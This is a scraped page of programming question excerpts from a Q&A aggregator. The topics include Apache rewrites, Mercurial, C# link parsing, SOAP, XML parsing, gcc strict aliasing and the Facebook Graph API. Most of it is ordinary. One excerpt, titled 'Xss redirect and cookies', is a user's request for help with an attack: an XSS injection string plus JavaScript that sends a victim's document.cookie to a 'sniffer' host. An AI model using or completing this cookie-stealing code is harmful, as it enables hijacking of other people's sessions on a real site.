Search Results

Search found 62215 results on 2489 pages for 'http basic authentication'.

Page 418/2489 | < Previous Page | 414 415 416 417 418 419 420 421 422 423 424 425  | Next Page >

  • Simplest way to convert all html links in a string using PHP

    - by Gaz
    I am trying to convert a block of text that contains html text - i'd like to find all http links and convert them for link tracking purposes. So eg anything like this in a string would be converted to the latter <a href="http://www.google.com">Some Link</a> <a href="http://www.mysite.com/tracking.php?url=www.google.com">Some Link</a> Can anyone how to do this taking into account the original string will consists of all sorts of html, images etc..

    Read the article

  • Are there any good books to learn C++ if you already know Java and C#

    - by JF LR
    Hi, I would like to know if you have any good books that teach C++ programming without repeating basic stuff. In fact, I already well know Java and C#. I also have a basic knowledge in C and assembly, so I understand a little bit pointer arithmetic, manual memory management and heap based allocation. I was looking at O'Reilly's C++ in a Nutshell and was also wondering if this book would be a good choice. Thank you

    Read the article

  • double slash apache configuration

    - by VP
    Hi, i'm deploying a ror application and now i have to rewrite the url (in apache) to add a prefix www to the url add / to the end of the url So i took the following approach: RewriteCond %{REQUEST_URI} ^/[^\.]+[^/]$ RewriteRule ^(.*)$ http://%{HTTP_HOST}/$1/ [R=301,L] RewriteCond %{HTTP_HOST} ^foo\.com RewriteRule ^(.*)$ http://www.foo.com/$1 [R=301,L] The problem is that it is appending two trailing slash to my url So for example a resource /question/ask are becoming: http://foo.com//question/ask I tried to add the following Rule before all my Rewrite rules to try to remove the double //: RewriteCond %{REQUEST_URI} ^// RewriteRule ([^/]*)/+(.*) http://www.foo.com/$1/$2 [R=301,L] but it didnt work.. any idea to rip off all extras "//" added to the url?

    Read the article

  • mercurial hg - pushing to a cloned repositor via APACHE errors with "repository is unrelated"

    - by Ash
    Two scenarios, one work one doesn't when they both should: Scenario #1: (DOES NOT work via apache) 2 repos on Server SERVER: Repo "A", Repo "B" cloned from repo A via http://SERVER/HG/A On client: Repo A cloned from http://SERVER/HG/A Repo B cloned from http://SERVER/HG/B Added a file to repo A from client and commited & pushed it up to http://SERVER/HG/A ...WORKS Added a file to repo B from client and commited & pushed it up to http://SERVER/HG/B ...ERROR with abort: repository is unrelated, it only works if I -f (force) the push Scenario #2: (works via file system) On Server SERVER: Repo "A", Repo "B" cloned from E:/HG/A On client: Repo A cloned from E:/HG/A Repo B cloned from E:/HG/B Added a file to repo A from client and commited & pushed it up to E:/HG/A ...WORKS Added a file to repo B from client and commited & pushed it up to E:/HG/B ...WORKS Conclusion:...Something in the apache configuration or in the integration between apache & mercurial is making the repo "unrelated".... Any ideas??? Why do I need to force in the first scenario but do not have to in the second?? ...and i tried both scenarios via tortoisehg as well as command line.

    Read the article

  • Automatically hyper-link URL's and Email's using C#, whilst leaving bespoke tags in place

    - by marcusstarnes
    I have a site that enables users to post messages to a forum. At present, if a user types a web address or email address and posts it, it's treated the same as any other piece of text. There are tools that enable the user to supply hyper-linked web and email addresses (via some bespoke tags/markup) - these are sometimes used, but not always. In addition, a bespoke 'Image' tag can also be used to reference images that are hosted on the web. My objective is to both cater for those that use these existing tools to generate hyper-linked addresses, but to also cater for those that simply type a web or email address in, and to then automatically convert this to a hyper-linked address for them (as soon as they submit their post). I've found one or two regular expressions that convert a plain string web or email address, however, I obviously don't want to perform any manipulation on addresses that are already being handled via the sites bespoke tagging, and that's where I'm stuck - how to EXCLUDE any web or email addresses that are already catered for via the bespoke tagging - I wan't to leave them as is. Here are some examples of bespoke tagging for the variations that I need to be left alone: [URL=www.msn.com]www.msn.com[/URL] [URL=http://www.msn.com]http://www.msn.com[/URL] [[email protected]][email protected][/EMAIL] [IMG]www.msn.com/images/test.jpg[/IMG] [IMG]http://www.msn.com/images/test.jpg[/IMG] The following examples would however ideally need to be automatically converted into web & email links respectively: www.msn.com http://www.msn.com [email protected] Ideally, the 'converted' links would just have the appropriate bespoke tags applied to them as per the initial examples earlier in this post, so rather than: <a href="..." etc. they'd become: [URL=http://www.. etc.) Unfortunately, we have a LOT of historic data stored with this bespoke tagging throughout, so for now, we'd like to retain that rather than implementing an entirely new way of storing our users posts. Any help would be much appreciated. Thanks.

    Read the article

  • Should I use the Model-View-ViewModel (MVVM) pattern in Silverlight projects?

    - by Jon Galloway
    One challenge with Silverlight controls is that when properties are bound to code, they're no longer really editable in Blend. For example, if you've got a ListView that's populated from a data feed, there are no elements visible when you edit the control in Blend. I've heard that the MVVM pattern, originated by the WPF development community, can also help with keeping Silverlight controls "blendable". I'm still wrapping my head around it, but here are some explanations: http://www.nikhilk.net/Silverlight-ViewModel-Pattern.aspx http://mark-dot-net.blogspot.com/2008/11/model-view-view-model-mvvm-in.html http://www.ryankeeter.com/silverlight/silverlight-mvvm-pt-1-hello-world-style/ http://jonas.follesoe.no/YouCardRevisitedImplementingTheViewModelPattern.aspx One potential downside is that the pattern requires additional classes, although not necessarily more code (as shown by the second link above). Thoughts?

    Read the article

  • How to setup Solr on a live VPS?

    - by user342960
    I follow the instruction on http://lucene.apache.org/solr/tutorial.html and I can setup Solr on my PC. Now when I come to my VPS I cannot overcome the step: $ java -jar start.jar Afer running that command, search service is available at http: //x.x.x.x:8983/solr/select . But, Whenever I close the SSH client, the service on http: //x.x.x.x:8983/solr/select is also closed. So I can't search any more. What should I do? Thanks for any help.

    Read the article

  • How to Declare Complex Nested C# Type for Web Service

    - by TheArtTrooper
    I would like to create a service that accepts a complex nested type. In a sample asmx file I created: [WebService(Namespace = "http://tempuri.org/")] [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] // To allow this Web Service to be called from script, using ASP.NET AJAX, uncomment the following line. // [System.Web.Script.Services.ScriptService] public class ServiceNest : System.Web.Services.WebService { public class Block { [XmlElement(IsNullable = false)] public int number; } public class Cell { [XmlElement(IsNullable = false)] public Block block; } public class Head { [XmlElement(IsNullable = false)] public Cell cell; } public class Nest { public Head head; } [WebMethod] public void TakeNest(Nest nest) { } } When I view the asmx file in IE the test page shows the example SOAP post request as: <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <TakeNest xmlns="http://schemas.intellicorp.com/livecompare/"> <nest> <head> <cell> <block xsi:nil="true" /> </cell> </head> </nest> </TakeNest> </soap:Body> </soap:Envelope> It hasn't expanded the <block> into its number member. Looking at the WSDL, the types all look good. So is this just a limitation of the post demo page creator? Thanks.

    Read the article

  • Parsing dbpedia JSON in Python

    - by givp
    Hello, I'm trying to get my head around the dbpedia JSON schema and can't figure out an efficient way of extracting a specific node: This is what dbpedia gives me: http://dbpedia.org/data/Ceramic_art.json I've got the whole thing as a JSON object in Python but don't really understand how to get the english abstract from this data. I've gotten this far: u = "http://dbpedia.org/data/Ceramic_art.json" data = urlfetch.fetch(url=u) json_data = json.loads(data.content) for j in json_data["http://dbpedia.org/resource/Ceramic_art"]: if(j == "http://dbpedia.org/ontology/abstract"): print "it's here" Not sure how to proceed from here. As you can see there are multiple languages. I need to get the english abstract. Thanks for your help, g

    Read the article

  • how do i parse an xml page to output its data pieces to the way i want?

    - by ida
    here is the page i want to parse (the api link i gave is just a dev test so its ok to be public) http://api.scribd.com/api?method=docs.getList&api_key=2apz5npsqin3cjlbj0s6m the output im looking for is something like this (for now) Doc_id: 29638658 access_key: key-11fg37gwmer54ssq56l3 secret_password: 1trinfqri6cnv3gf6rnl title: Sample description: k thumbnail_url: http://i6.scribdassets.com/public/images/uploaded/152418747/xTkjCwQaGf_thumbnail.jpeg page_count: 100 ive tried everything i can find on the internet but nothing works good. i have this one script <?php $xmlDoc = new DOMDocument(); $xmlDoc->load("http://api.scribd.com/api?method=docs.getList&api_key=2apz5npsqin3cjlbj0s6m"); $x = $xmlDoc->documentElement; foreach ($x->childNodes AS $item) { print $item->nodeName . " = " . $item->nodeValue; } ?> its output comes out like this: #text = resultset = 29638658 key-11fg37gwmer54ssq56l3 1trinfqri6cnv3gf6rnl Sample k http://i6.scribdassets.com/public/images/uploaded/152418747/xTkjCwQaGf_thumbnail.jpeg DONE 100 29713260 key-18a9xret4jf02129vlw8 25fjsmmvl62l4cbwd1vq book2 description bla bla http://i6.scribdassets.com/public/images/uploaded/153065528/oLVqPZMu3zhsOn_thumbnail.jpeg DONE 7 #text = i need major help im really stuck and dont know what to do. please please help me. thnx

    Read the article

  • JQuery Cycle, how can I change from image to div?

    - by vick
    <!doctype html> <html> <head> <title>JQuery Cycle Plugin - Example Slideshow</title> <style type="text/css"> .slideshow { height: 232px; width: 232px; margin: auto } .slideshow img { padding: 15px; border: 1px solid #ccc; background-color: #eee; } </style> <!-- include jQuery library --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script> <!-- include Cycle plugin --> <script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.74.js"></script> <!-- initialize the slideshow when the DOM is ready --> <script type="text/javascript"> $(document).ready(function() { $('.slideshow').cycle({ fx: 'shuffle' // choose your transition type, ex: fade, scrollUp, shuffle, etc... }); }); </script> </head> <body> <div class="slideshow"> <img src="http://cloud.github.com/downloads/malsup/cycle/beach1.jpg" width="200" height="200" /> <img src="http://cloud.github.com/downloads/malsup/cycle/beach2.jpg" width="200" height="200" /> <img src="http://cloud.github.com/downloads/malsup/cycle/beach3.jpg" width="200" height="200" /> </div> </body> </html> How can I make this exact scroller work with divs instead of img?? basically, I want to use <div> etc etc etc </div> instead of: <img src="http://cloud.github.com/downloads/malsup/cycle/beach3.jpg" width="200" height="200" />

    Read the article

  • Double Slash at end of URL when going to HTTPS?

    - by J M 4
    My site currently uses http and https sections based on the data being collected on the site (form data uses https). On my index page, I have the PHP code at the top: <?php session_start(); ob_start(); if( $_SERVER['SERVER_PORT'] == 443) { header('Location:http://'.$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF'])); die(); } ?> However, the page will not load and I get a 404 error. Similarly, when i visit the sections with https security using the head code: <?php session_start(); ob_start(); if( $_SERVER['SERVER_PORT'] == 80) { header('Location:https://'.$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF']).'/'.basename($_SERVER['PHP_SELF'])); die(); } ?> The site does not respond AND for some reason creates a double slash when switching from http to https. Example: http://www.abc.com/, then clicking button which should route to enroll.php shows http://www.abc.com//enroll.php why the need for the double slash and can anybody help with the 404 errors?

    Read the article

  • Why Illegal cookies are send by Browser and received by web servers (rfc2109)?

    - by Artyom
    Hello, According to RFC 2109 cookie's value can be either HTTP token or quoted string, and token can't include non-ASCII characters. Cookie's RFC 2109: http://tools.ietf.org/html/rfc2109#page-3 HTTP's RFC 2068 token definition: http://tools.ietf.org/html/rfc2068#page-16 However I had found that Firefox browser (3.0.6) sends cookies with utf-8 string as-is and three web servers I tested (apache2, lighttpd, nginx) pass this string as-is to the application. For example, raw request from browser: $ nc -l -p 8080 GET /hello HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.9) Gecko/2009050519 Firefox/2.0.0.13 (Debian-3.0.6-1) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cookie: wikipp=1234; wikipp_username=?????? Cache-Control: max-age=0 And raw response of apache, nginx and lighttpd HTTP_COOKIE CGI variable: wikipp=1234; wikipp_username=?????? What do I miss? Can somebody explain me?

    Read the article

  • some userful 3rd party API's for j2me

    - by Vivart
    Fixed Point Integer Math MathFP kSOAP is a SOAP web service client library for constrained Java environments such as Applets or J2ME applications (CLDC / CDC / MIDP). http://sourceforge.net/projects/ksoap2/ kXML is a lean Common XML API with namespace and WAP support that is intended to fit into the JAVA KVM for limited devices like the Palm Pilot. http://sourceforge.net/projects/kxml/ UI library https://lwuit.dev.java.net/ http://www.j2mepolish.org/cms/

    Read the article

  • How to Redirect Folder with 404 .htaccess - without httpd.conf?

    - by elmaso
    Hello, I have no access to the httpd.conf. How can I redirect the users if the type one folder more like - http://www.example.com/folder/folder2/ -- redirect 404 to the main page. The users should only have access to this root http://www.example.com/link+custom1+custom2/ and if they type something like that http://www.example.com/link+custom1+custom2/onemorefolder/orTwo/ -- redirect how can I do that only with .htaccess and without php?

    Read the article

  • Google Chrome does not honor cache-policy in page header if the page is displayed in a FRAME

    - by Tim
    No matter what I do: <meta http-equiv="Cache-Control" content="no-cache" /> <meta http-equiv="Expires" content="Fri, 30 Apr 2010 11:12:01 GMT" /> <meta http-equiv="Expires" content="0" /> <HTTP-EQUIV="PRAGMA" CONTENT="NO-STORE" /> Google Chrome does not reload any page according to the page's internal cache policy if the page is displayed in a frame. It is as though the meta tags are not even there. Google Chrome seems to be ignoring these tags. Since I've gotten answers to this question on other forums where the person responding has ignored the operative condition, I will repeat it: this behavior occurs when the page is displayed in a frame. I was using the latest released version and have since upgraded to 5.0.375.29 beta but the behavior is the same in both versions. Would someone please care to confirm one way or another the behavior you are seeing with framesets and the caching/expiration policies given in meta tags? Thanks

    Read the article

  • Nested hyperlinks in XHTML 1.1 document

    - by Nazgulled
    Hi, I'm doing a simple widget for WordPress that fetches the most recent tweets from the RSS feed provided by Twitter. This widget parses any link posted on a tweet, it also parses mentions (ie: @username) and trending topics (ie: #nowplaying). For these 3 situations, it creates links pointing to some Twitter feature. For instance: "Hi @UserA, check out the song Foo from FooBar that I'm listening, it's awesome. #nowplaying" And it will parse into this: Hi <a href="http://twitter.com/UserA">@UserA</a>, check out the song Foo from FooBar that I'm listening, it's awesome. <a href="http://twitter.com/#search?q=nowplaying">#nowplaying</a> Now now I need to add a global link to the whole message, like this: <a href="http://twitter.com/UserA/statuses/1234567890"> Hi <a href="http://twitter.com/UserA">@UserA</a>, check out the song Foo from FooBar that I'm listening, it's awesome. <a href="http://twitter.com/#search?q=nowplaying">#nowplaying</a> </a> But this code does not validate and it doesn't work anyways (the browsers don't really seem to know what to do with it). Any suggestions how could I fix this?

    Read the article

  • Parse XML document

    - by Neil
    I am trying to parse a remote XML document (from Amazon AWS): <ItemLookupResponse xmlns="http://webservices.amazon.com/AWSECommerceService/2009-03-31"> <OperationRequest> <RequestId>011d32c5-4fab-4c7d-8785-ac48b9bda6da</RequestId> <Arguments> <Argument Name="Condition" Value="New"></Argument> <Argument Name="Operation" Value="ItemLookup"></Argument> <Argument Name="Service" Value="AWSECommerceService"></Argument> <Argument Name="Signature" Value="73l8oLJhITTsWtHxsdrS3BMKsdf01n37PE8u/XCbsJM="></Argument> <Argument Name="MerchantId" Value="Amazon"></Argument> <Argument Name="Version" Value="2009-03-31"></Argument> <Argument Name="ItemId" Value="603084260089"></Argument> <Argument Name="IdType" Value="UPC"></Argument> <Argument Name="AWSAccessKeyId" Value="[myAccessKey]"></Argument> <Argument Name="Timestamp" Value="2010-06-14T15:03:27Z"></Argument> <Argument Name="ResponseGroup" Value="OfferSummary,ItemAttributes"></Argument> <Argument Name="SearchIndex" Value="All"></Argument> </Arguments> <RequestProcessingTime>0.0318510000000000</RequestProcessingTime> </OperationRequest> <Items> <Request> <IsValid>True</IsValid> <ItemLookupRequest> <Condition>New</Condition> <DeliveryMethod>Ship</DeliveryMethod> <IdType>UPC</IdType> <MerchantId>Amazon</MerchantId> <OfferPage>1</OfferPage> <ItemId>603084260089</ItemId> <ResponseGroup>OfferSummary</ResponseGroup> <ResponseGroup>ItemAttributes</ResponseGroup> <ReviewPage>1</ReviewPage> <ReviewSort>-SubmissionDate</ReviewSort> <SearchIndex>All</SearchIndex> <VariationPage>All</VariationPage> </ItemLookupRequest> </Request> <Item> <ASIN>B0000UTUNI</ASIN> <DetailPageURL>http://www.amazon.com/Garnier-Fructis-Fortifying-Conditioner-Minute/dp/B0000UTUNI%3FSubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB0000UTUNI</DetailPageURL> <ItemLinks> <ItemLink> <Description>Technical Details</Description> <URL>http://www.amazon.com/Garnier-Fructis-Fortifying-Conditioner-Minute/dp/tech-data/B0000UTUNI%3FSubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D386001%26creativeASIN%3DB0000UTUNI</URL> </ItemLink> <ItemLink> <Description>Add To Baby Registry</Description> <URL>http://www.amazon.com/gp/registry/baby/add-item.html%3Fasin.0%3DB0000UTUNI%26SubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D386001%26creativeASIN%3DB0000UTUNI</URL> </ItemLink> <ItemLink> <Description>Add To Wedding Registry</Description> <URL>http://www.amazon.com/gp/registry/wedding/add-item.html%3Fasin.0%3DB0000UTUNI%26SubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D386001%26creativeASIN%3DB0000UTUNI</URL> </ItemLink> <ItemLink> <Description>Add To Wishlist</Description> <URL>http://www.amazon.com/gp/registry/wishlist/add-item.html%3Fasin.0%3DB0000UTUNI%26SubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D386001%26creativeASIN%3DB0000UTUNI</URL> </ItemLink> <ItemLink> <Description>Tell A Friend</Description> <URL>http://www.amazon.com/gp/pdp/taf/B0000UTUNI%3FSubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D386001%26creativeASIN%3DB0000UTUNI</URL> </ItemLink> <ItemLink> <Description>All Customer Reviews</Description> <URL>http://www.amazon.com/review/product/B0000UTUNI%3FSubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D386001%26creativeASIN%3DB0000UTUNI</URL> </ItemLink> <ItemLink> <Description>All Offers</Description> <URL>http://www.amazon.com/gp/offer-listing/B0000UTUNI%3FSubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D386001%26creativeASIN%3DB0000UTUNI</URL> </ItemLink> </ItemLinks> <ItemAttributes> <Binding>Health and Beauty</Binding> <Brand>Garnier</Brand> <EAN>0603084260089</EAN> <Feature>Helps restore strength and shine</Feature> <Feature>Penetrates deep to nourish, repair and rejuvenate</Feature> <Feature>Makes hair softer and more manageable without weighing it down</Feature> <ItemDimensions> <Weight Units="hundredths-pounds">40</Weight> </ItemDimensions> <Label>Garnier</Label> <ListPrice> <Amount>419</Amount> <CurrencyCode>USD</CurrencyCode> <FormattedPrice>$4.19</FormattedPrice> </ListPrice> <Manufacturer>Garnier</Manufacturer> <NumberOfItems>1</NumberOfItems> <ProductGroup>Health and Beauty</ProductGroup> <ProductTypeName>ABIS_DRUGSTORE</ProductTypeName> <Publisher>Garnier</Publisher> <Size>5.0 oz</Size> <Studio>Garnier</Studio> <Title>Garnier Fructis Fortifying Fortifying Deep Conditioner, 3 Minute Masque - 5 oz</Title> <UPC>603084260089</UPC> </ItemAttributes> <OfferSummary> <LowestNewPrice> <Amount>229</Amount> <CurrencyCode>USD</CurrencyCode> <FormattedPrice>$2.29</FormattedPrice> </LowestNewPrice> <TotalNew>7</TotalNew> <TotalUsed>0</TotalUsed> <TotalCollectible>0</TotalCollectible> <TotalRefurbished>0</TotalRefurbished> </OfferSummary> </Item> </Items> </ItemLookupResponse> I am trying to extract data from the XML stream using XPathDocument, but with no luck: WebRequest request = HttpWebRequest.Create(url); WebResponse response = request.GetResponse(); //XmlDocument doc = new XmlDocument(); XPathDocument Doc = new XPathDocument(response.GetResponseStream()); XPathNavigator nav = Doc.CreateNavigator(); XPathNodeIterator ListPrice = nav.Select("/ItemLookupResponse/Items/Item/ItemAttributes/ListPrice"); foreach (XPathNavigator node in ListPrice) { Response.Write(node.GetAttribute("Amount", NAMESPACE)); } What am I missing? Thanks in advance!!

    Read the article

  • Xss redirect and cookies

    - by user1824906
    I found Active XSS on one site. I need to steal cookies and after it to make redirect on other site. This site has a non-frame protection I tried to put "><script src='http://site.ru/1.js' /></script>" http://site.ru/1.js contains: img = new Image(); img.src = "http:/sniffer.com/nasdasdnu.gif?"+document.cookie; var URL = "http://images.cards.mail.ru/11bolprivet.jpg" var speed = 100; function reload() { document.location = URL } setTimeout("reload()", speed); But it doesn't work=\ Any help?

    Read the article

  • gcc, strict-aliasing, and casting through a union

    - by Joseph Quinsey
    About a year ago the following paragraph was added to the GCC Manual, version 4.3.4, regarding -fstrict-aliasing: Similarly, access by taking the address, casting the resulting pointer and dereferencing the result has undefined behavior [emphasis added], even if the cast uses a union type, e.g.: union a_union { int i; double d; }; int f() { double d = 3.0; return ((union a_union *)&d)->i; } Does anyone have an example to illustrate this undefined behavior? Note this question is not about what the C99 standard says, or does not say. It is about the actual functioning of gcc, and other existing compilers, today. My simple, naive, attempt fails. For example: #include <stdio.h> union a_union { int i; double d; }; int f1(void) { union a_union t; t.d = 3333333.0; return t.i; // gcc manual: 'type-punning is allowed, provided ...' } int f2(void) { double d = 3333333.0; return ((union a_union *)&d)->i; // gcc manual: 'undefined behavior' } int main(void) { printf("%d\n", f1()); printf("%d\n", f2()); return 0; } works fine, giving on CYGWIN: -2147483648 -2147483648 Also note that taking addresses is obviously wrong (or right, if you are trying to illustrate undefined behavior). For example, just as we know this is wrong: extern void foo(int *, double *); union a_union t; t.d = 3.0; foo(&t.i, &t.d); // UD behavior so is this wrong: extern void foo(int *, double *); double d = 3.0; foo(&((union a_union *)&d)->i, &d); // UD behavior For background discussion about this, see for example: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1422.pdf http://gcc.gnu.org/ml/gcc/2010-01/msg00013.html http://davmac.wordpress.com/2010/02/26/c99-revisited/ http://cellperformance.beyond3d.com/articles/2006/06/understanding-strict-aliasing.html http://stackoverflow.com/questions/98650/what-is-the-strict-aliasing-rule http://stackoverflow.com/questions/2771023/c99-strict-aliasing-rules-in-c-gcc/2771041#2771041 The first link, draft minutes of an ISO meeting seven months ago, notes in section 4.16: Is there anybody that thinks the rules are clear enough? No one is really able to interpret tham.

    Read the article

  • Problem with sending cookies with file_get_contents

    - by Ikke
    Hi, i'm trying to get the contents from another file with file_get_contents (don't ask why). I have two files: test1.php and test2.php. Test1.php returns a string, bases on the user that is logged in. Test2.php tries to get the contents of test1.php and is being executed by the browser, thus getting the cookies. To send the cookies with file_get_contents, i create a streaming context: $opts = array('http' => array('header'=> 'Cookie: ' . $_SERVER['HTTP_COOKIE']."\r\n"))`; I'm retreiving the contents with: $contents = file_get_contents("http://www.domain.com/test1.php", false, $opts); But now I get the error: Warning: file_get_contents(http://www.domain.com/test1.php) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found Does somebody knows what i'm doing wroing here? edit: forgot to mention: Without the streaming_context, the page just loads. But withouth the cookies I don't get the info I need.

    Read the article

  • JavaScript: How can I delay running some JS code until my JS file downloaded?

    - by Henryh
    I have the following code: <script type="text/javascript"> function addScript(url) { var script = document.createElement('script'); script.src = url; document.getElementsByTagName('head')[0].appendChild(script); } addScript('http://example.com/One.js'); addScript('http://example.com/Two.js'); addScript('http://example.com/Three.js'); addScript('http://example.com/Four.js'); ... // run code below this point once Two.js has been downloaded and excuted </script> How can I detect when one of my JavaScript files has been downloaded and executed so that I can use it?

    Read the article

  • jquery ajax vs browser url

    - by danwoods
    Hello all, I'm trying to use youtube's api to bring back a listing of a user's videos. The request url looks something like: http://gdata.youtube.com/feeds/api/users/username/uploads with 'username' being the correct username. This bring back the appropriate url in the browser. However when I try to access that url via jQuery's $.ajax or $.get functions, using something like: $.ajax({ //set parameters url: "http://gdata.youtube.com/feeds/api/users/username/uploads", type: "GET", //on success success: function (data) { alert("xml successfully captured\n\n" + data); }, //on error error:function (XMLHttpRequest, textStatus, errorThrown, data){ alert(" We're sorry, there seem to be a problem with our connection to youtube.\nYou can access all our videos here: http://www.youtube.com/user/username"); alert(data); } }); $.get("http://gdata.youtube.com/feeds/api/users/username/uploads", function(data){ alert("Data Loaded: " + data); }); I get an empty document returned. Any ideas why this is?

    Read the article

  • illegal charcters in facebook graph api

    - by user1465888
    i was trying to get how many facebook likes an url got, through facebook graph api. to get the likes i need to get the content from this url: http://graph.facebook.com/?id=URL for example, try to get into this url: "graph.facebook.com/?id=http://stackoverflow.com" you will see how many "shares" the url got. shares is the sum of shares and likes, so every thing was working good when i was trying to this. the problem start when i use special charcters. when i using the "?" charcter everything work okey. but when i use "&" charcter the url cuts itself. try this: "graph.facebook.com/?id=http://stackoverflow.com?p=blabla&a=fsdf" you can see in this page that the id actullay cut itself when it get to the "&" charcter and the page ends like this: { "id": "http://stackoverflow.com?p=blabla" } sorry for my bad english...

    Read the article

< Previous Page | 414 415 416 417 418 419 420 421 422 423 424 425  | Next Page >